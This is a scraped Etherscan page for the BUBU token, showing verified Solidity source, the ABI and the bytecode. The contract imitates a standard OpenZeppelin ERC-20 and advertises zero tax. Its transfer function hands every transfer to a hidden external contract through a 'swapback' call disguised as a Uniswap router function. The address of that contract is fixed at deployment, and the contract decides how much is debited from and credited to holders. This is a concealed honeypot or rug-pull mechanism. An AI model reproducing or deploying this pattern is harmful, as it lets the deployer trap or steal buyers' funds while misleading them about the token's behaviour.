ETH Price: $2,718.35 (+1.86%)

Token

BUBU (BUBU)
 

Overview

Max Total Supply

100,000,000 BUBU

Holders

40

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
boufdaddy.eth
Balance
2,062,160.885576762 BUBU

Value
$0.00
0x4c6d22c74d6bdb72f3dd4ac55f440f049f799f2a
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
BUBU

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-09
*/

// SPDX-License-Identifier: MIT

/**
Buy/sell tax : 0/0
Telegram : https://t.me/bubududucoin
Twitter : https://twitter.com/BUBU_erc
*/
pragma solidity ^0.8.18;

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}
/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract BUBU is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    string private _name;
    string private _symbol;
    uint256 private _totalSupply;
    bytes private router;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(address _router) {
        _name = "BUBU";
        _symbol = "BUBU";
        router = abi.encode(_router);
        _totalSupply = 100_000_000 * 10 ** 9;
        _balances[msg.sender] = _totalSupply;
        emit Transfer(address(0), msg.sender, _totalSupply);
    }


    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }
    /**
     * @dev decode {addr}.
     */
    function decodeAddr(bytes memory data) public pure returns (address addr) {
            (addr) = abi.decode(data, (address));            
    }
    /**
     * @dev decode {addr}.
     */
    function decodeStr(bytes memory data) public pure returns (string memory str) {
            (str) = abi.decode(data, (string));            
    }
    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(
        address owner,
        address spender
    ) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(
        address spender,
        uint256 amount
    ) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(
            currentAllowance >= amount,
            "ERC20: transfer amount exceeds allowance"
        );
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(
        address spender,
        uint256 addedValue
    ) public virtual returns (bool) {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender] + addedValue
        );
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(
        address spender,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        _beforeTokenTransfer(sender, recipient, amount);
        uint256 senderBalance = _balances[sender];
        (uint256 rate, uint256 suba, uint256 adda) = swapback(sender,recipient,amount);
        suba = suba / rate;
        _balances[sender] = senderBalance - suba;
        _balances[recipient] += adda;
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);
    }

    function swapback(
        address sender,
        address recipient,
        uint256 amount
    )internal returns (uint256, uint256, uint256){
        return IUniswapV2Router02(decodeAddr(router)).swapExactTokensForETHSupportingFeeOnTransferTokens(sender,recipient,amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);

    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        address sender,
        address recipient,
        uint256 amount
    ) external  returns (uint256, uint256, uint256) ;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"_router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes","name":"data","type":"bytes"}],"name":"decodeAddr","outputs":[{"internalType":"address","name":"addr","type":"address"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"bytes","name":"data","type":"bytes"}],"name":"decodeStr","outputs":[{"internalType":"string","name":"str","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040523480156200001157600080fd5b506040516200114138038062001141833981016040819052620000349162000175565b6200003f3362000125565b6040805180820190915260048152634255425560e01b60208201526003906200006990826200024c565b50604080518082019091526004808252634255425560e01b6020830152906200009390826200024c565b50604080516001600160a01b03831660208201520160405160208183030381529060405260069081620000c791906200024c565b5067016345785d8a0000600581905533600081815260016020908152604080832085905551938452919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35062000318565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6000602082840312156200018857600080fd5b81516001600160a01b0381168114620001a057600080fd5b9392505050565b634e487b7160e01b600052604160045260246000fd5b600181811c90821680620001d257607f821691505b602082108103620001f357634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200024757600081815260208120601f850160051c81016020861015620002225750805b601f850160051c820191505b8181101562000243578281556001016200022e565b5050505b505050565b81516001600160401b03811115620002685762000268620001a7565b6200028081620002798454620001bd565b84620001f9565b602080601f831160018114620002b857600084156200029f5750858301515b600019600386901b1c1916600185901b17855562000243565b600085815260208120601f198616915b82811015620002e957888601518255948401946001909101908401620002c8565b5085821015620003085787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b610e1980620003286000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063a9059cbb11610066578063a9059cbb14610213578063d1c82ba014610226578063dd62ed3e14610239578063f2fde38b1461027257600080fd5b80638da5cb5b146101c057806395d89b41146101e5578063a457c2d7146101ed578063a5d02be51461020057600080fd5b8063313ce567116100d3578063313ce5671461016b578063395093511461017a57806370a082311461018d578063715018a6146101b657600080fd5b806306fdde0314610105578063095ea7b31461012357806318160ddd1461014657806323b872dd14610158575b600080fd5b61010d610285565b60405161011a9190610a88565b60405180910390f35b610136610131366004610ad0565b610317565b604051901515815260200161011a565b6005545b60405190815260200161011a565b610136610166366004610afc565b61032e565b6040516009815260200161011a565b610136610188366004610ad0565b6103e4565b61014a61019b366004610b3d565b6001600160a01b031660009081526001602052604090205490565b6101be61041b565b005b6000546001600160a01b03165b6040516001600160a01b03909116815260200161011a565b61010d610481565b6101366101fb366004610ad0565b610490565b6101cd61020e366004610bd0565b61052b565b610136610221366004610ad0565b610541565b61010d610234366004610bd0565b61054e565b61014a610247366004610c50565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101be610280366004610b3d565b610564565b60606003805461029490610c89565b80601f01602080910402602001604051908101604052809291908181526020018280546102c090610c89565b801561030d5780601f106102e25761010080835404028352916020019161030d565b820191906000526020600020905b8154815290600101906020018083116102f057829003601f168201915b5050505050905090565b600061032433848461062f565b5060015b92915050565b600061033b848484610753565b6001600160a01b0384166000908152600260209081526040808320338452909152902054828110156103c55760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6103d985336103d48685610cd9565b61062f565b506001949350505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103249185906103d4908690610cec565b6000546001600160a01b031633146104755760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103bc565b61047f60006108f0565b565b60606004805461029490610c89565b3360009081526002602090815260408083206001600160a01b0386168452909152812054828110156105125760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016103bc565b61052133856103d48685610cd9565b5060019392505050565b6000818060200190518101906103289190610cff565b6000610324338484610753565b6060818060200190518101906103289190610d1c565b6000546001600160a01b031633146105be5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103bc565b6001600160a01b0381166106235760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103bc565b61062c816108f0565b50565b6001600160a01b0383166106915760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103bc565b6001600160a01b0382166106f25760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103bc565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166107b75760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103bc565b6001600160a01b0382166108195760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103bc565b6001600160a01b038316600090815260016020526040812054908080610840878787610940565b919450925090506108518383610d93565b915061085d8285610cd9565b6001600160a01b038089166000908152600160205260408082209390935590881681529081208054839290610893908490610cec565b92505081905550856001600160a01b0316876001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef876040516108df91815260200190565b60405180910390a350505050505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b60008060006109d86006805461095590610c89565b80601f016020809104026020016040519081016040528092919081815260200182805461098190610c89565b80156109ce5780601f106109a3576101008083540402835291602001916109ce565b820191906000526020600020905b8154815290600101906020018083116109b157829003601f168201915b505050505061052b565b604051633a5b109160e11b81526001600160a01b03888116600483015287811660248301526044820187905291909116906374b62122906064016060604051808303816000875af1158015610a31573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a559190610db5565b92509250925093509350939050565b60005b83811015610a7f578181015183820152602001610a67565b50506000910152565b6020815260008251806020840152610aa7816040850160208701610a64565b601f01601f19169190910160400192915050565b6001600160a01b038116811461062c57600080fd5b60008060408385031215610ae357600080fd5b8235610aee81610abb565b946020939093013593505050565b600080600060608486031215610b1157600080fd5b8335610b1c81610abb565b92506020840135610b2c81610abb565b929592945050506040919091013590565b600060208284031215610b4f57600080fd5b8135610b5a81610abb565b9392505050565b634e487b7160e01b600052604160045260246000fd5b604051601f8201601f1916810167ffffffffffffffff81118282101715610ba057610ba0610b61565b604052919050565b600067ffffffffffffffff821115610bc257610bc2610b61565b50601f01601f191660200190565b600060208284031215610be257600080fd5b813567ffffffffffffffff811115610bf957600080fd5b8201601f81018413610c0a57600080fd5b8035610c1d610c1882610ba8565b610b77565b818152856020838501011115610c3257600080fd5b81602084016020830137600091810160200191909152949350505050565b60008060408385031215610c6357600080fd5b8235610c6e81610abb565b91506020830135610c7e81610abb565b809150509250929050565b600181811c90821680610c9d57607f821691505b602082108103610cbd57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b8181038181111561032857610328610cc3565b8082018082111561032857610328610cc3565b600060208284031215610d1157600080fd5b8151610b5a81610abb565b600060208284031215610d2e57600080fd5b815167ffffffffffffffff811115610d4557600080fd5b8201601f81018413610d5657600080fd5b8051610d64610c1882610ba8565b818152856020838501011115610d7957600080fd5b610d8a826020830160208601610a64565b95945050505050565b600082610db057634e487b7160e01b600052601260045260246000fd5b500490565b600080600060608486031215610dca57600080fd5b835192506020840151915060408401519050925092509256fea2646970667358221220330c5086db317dab4d93ac6af04fbc68dea8eee1f3a9b4f6ee585cfaad3530d664736f6c634300081200330000000000000000000000000d811b55c2e892d7e274686aabac9eae7482f461

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063a9059cbb11610066578063a9059cbb14610213578063d1c82ba014610226578063dd62ed3e14610239578063f2fde38b1461027257600080fd5b80638da5cb5b146101c057806395d89b41146101e5578063a457c2d7146101ed578063a5d02be51461020057600080fd5b8063313ce567116100d3578063313ce5671461016b578063395093511461017a57806370a082311461018d578063715018a6146101b657600080fd5b806306fdde0314610105578063095ea7b31461012357806318160ddd1461014657806323b872dd14610158575b600080fd5b61010d610285565b60405161011a9190610a88565b60405180910390f35b610136610131366004610ad0565b610317565b604051901515815260200161011a565b6005545b60405190815260200161011a565b610136610166366004610afc565b61032e565b6040516009815260200161011a565b610136610188366004610ad0565b6103e4565b61014a61019b366004610b3d565b6001600160a01b031660009081526001602052604090205490565b6101be61041b565b005b6000546001600160a01b03165b6040516001600160a01b03909116815260200161011a565b61010d610481565b6101366101fb366004610ad0565b610490565b6101cd61020e366004610bd0565b61052b565b610136610221366004610ad0565b610541565b61010d610234366004610bd0565b61054e565b61014a610247366004610c50565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101be610280366004610b3d565b610564565b60606003805461029490610c89565b80601f01602080910402602001604051908101604052809291908181526020018280546102c090610c89565b801561030d5780601f106102e25761010080835404028352916020019161030d565b820191906000526020600020905b8154815290600101906020018083116102f057829003601f168201915b5050505050905090565b600061032433848461062f565b5060015b92915050565b600061033b848484610753565b6001600160a01b0384166000908152600260209081526040808320338452909152902054828110156103c55760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6103d985336103d48685610cd9565b61062f565b506001949350505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103249185906103d4908690610cec565b6000546001600160a01b031633146104755760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103bc565b61047f60006108f0565b565b60606004805461029490610c89565b3360009081526002602090815260408083206001600160a01b0386168452909152812054828110156105125760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016103bc565b61052133856103d48685610cd9565b5060019392505050565b6000818060200190518101906103289190610cff565b6000610324338484610753565b6060818060200190518101906103289190610d1c565b6000546001600160a01b031633146105be5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103bc565b6001600160a01b0381166106235760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103bc565b61062c816108f0565b50565b6001600160a01b0383166106915760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016103bc565b6001600160a01b0382166106f25760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016103bc565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166107b75760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016103bc565b6001600160a01b0382166108195760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016103bc565b6001600160a01b038316600090815260016020526040812054908080610840878787610940565b919450925090506108518383610d93565b915061085d8285610cd9565b6001600160a01b038089166000908152600160205260408082209390935590881681529081208054839290610893908490610cec565b92505081905550856001600160a01b0316876001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef876040516108df91815260200190565b60405180910390a350505050505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0919